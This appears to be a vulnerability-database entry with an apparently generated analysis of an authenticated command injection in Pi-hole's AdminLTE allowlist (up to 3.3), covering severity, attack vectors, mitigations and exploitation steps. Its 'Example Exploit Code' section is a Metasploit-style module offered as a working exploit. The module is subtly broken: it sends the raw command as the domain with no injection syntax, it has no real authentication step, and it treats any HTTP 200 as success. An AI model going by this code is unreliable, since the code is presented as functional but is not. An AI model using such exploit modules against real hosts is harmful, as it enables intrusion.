Description
An authenticated command injection vulnerability exists in Pi-hole versions up to 3.3. When adding a domain to the allowlist via the web interface, the domain parameter is not properly sanitized, allowing an attacker to append OS commands to the domain string. These commands are executed on the underlying operating system with the privileges of the Pi-hole service user. This behavior was present in the legacy AdminLTE interface and has since been patched in later versions.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2025-19902
1. Vulnerability Assessment and Severity Evaluation
The vulnerability described in EUVD-2025-19902 is an authenticated command injection flaw in Pi-hole versions up to 3.3. This vulnerability allows an attacker to execute arbitrary OS commands by appending them to the domain string when adding a domain to the allowlist via the web interface. The commands are executed with the privileges of the Pi-hole service user.
Severity Evaluation:
- Base Score: 9.0 (CVSS:4.0)
- Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
The high base score indicates a critical vulnerability due to the potential for complete system compromise, including confidentiality, integrity, and availability impacts.
2. Potential Attack Vectors and Exploitation Methods
Attack Vectors:
- Authenticated Command Injection: An attacker with valid credentials can exploit the vulnerability by injecting malicious commands into the domain parameter.
- Phishing and Social Engineering: Attackers may use phishing techniques to obtain valid credentials from Pi-hole administrators.
Exploitation Methods:
- Command Injection: By appending OS commands to the domain string, an attacker can execute arbitrary commands on the underlying system.
- Privilege Escalation: If the Pi-hole service user has elevated privileges, the attacker could gain further control over the system.
3. Affected Systems and Software Versions
Affected Systems:
- Pi-hole versions up to 3.3
- Systems using the legacy AdminLTE interface
Software Versions:
- Pi-hole Web Interface versions ≤ 3.3
4. Recommended Mitigation Strategies
Immediate Actions:
- Upgrade Pi-hole: Upgrade to the latest version (v4.0 or higher) where the vulnerability has been patched.
- Disable Legacy Interface: Ensure the legacy AdminLTE interface is disabled if not already done.
Long-Term Mitigations:
- Access Control: Implement strict access controls and multi-factor authentication (MFA) for the Pi-hole web interface.
- Regular Audits: Conduct regular security audits and vulnerability assessments.
- Monitoring: Implement monitoring and logging to detect and respond to suspicious activities.
5. Impact on European Cybersecurity Landscape
The vulnerability poses a significant risk to organizations and individuals using Pi-hole for network-wide ad blocking and DNS management. Given Pi-hole's widespread use in both home and enterprise environments, the potential for widespread exploitation is high. This underscores the importance of timely patching and proactive security measures to protect against such vulnerabilities.
6. Technical Details for Security Professionals
Vulnerability Details:
- CVE ID: CVE-2025-34087
- Vulnerable Component: Pi-hole Web Interface (AdminLTE)
- Exploitation Point: Domain parameter in the allowlist functionality
Exploitation Steps:
- Authentication: Obtain valid credentials for the Pi-hole web interface.
- Command Injection: Append OS commands to the domain string when adding a domain to the allowlist.
- Execution: The injected commands are executed with the privileges of the Pi-hole service user.
Example Exploit Code:
# Metasploit module for exploiting the vulnerability
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Pi-hole Allowlist Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Pi-hole versions up to 3.3.
By injecting OS commands into the domain parameter, an attacker can execute arbitrary commands.
},
'License' => MSF_LICENSE,
'Author' => ['Your Name'],
'References' =>
[
['URL', 'https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/pihole_whitelist_exec.rb'],
['URL', 'https://pi-hole.net/'],
['URL', 'https://github.com/pi-hole/web/releases/tag/v4.0'],
['URL', 'https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns'],
['URL', 'https://vulncheck.com/advisories/pihole-adminlte-whitelist-rce']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Pi-hole ≤ 3.3', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 03 2025'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Pi-hole web interface', '/admin/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', '']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', '']),
OptString.new('CMD', [true, 'The command to execute', 'id'])
])
end
def exploit
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'domain' => "#{datastore['CMD']}",
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})
if res && res.code == 200
print_good("Command executed successfully")
else
print_error("Failed to execute command")
end
end
end
References:
- Metasploit Module
- Pi-hole Official Website
- Pi-hole v4.0 Release
- Pulse Security Advisory
- VulnCheck Advisory
By following these guidelines and recommendations, organizations can effectively mitigate the risks associated with this vulnerability and enhance their overall cybersecurity posture.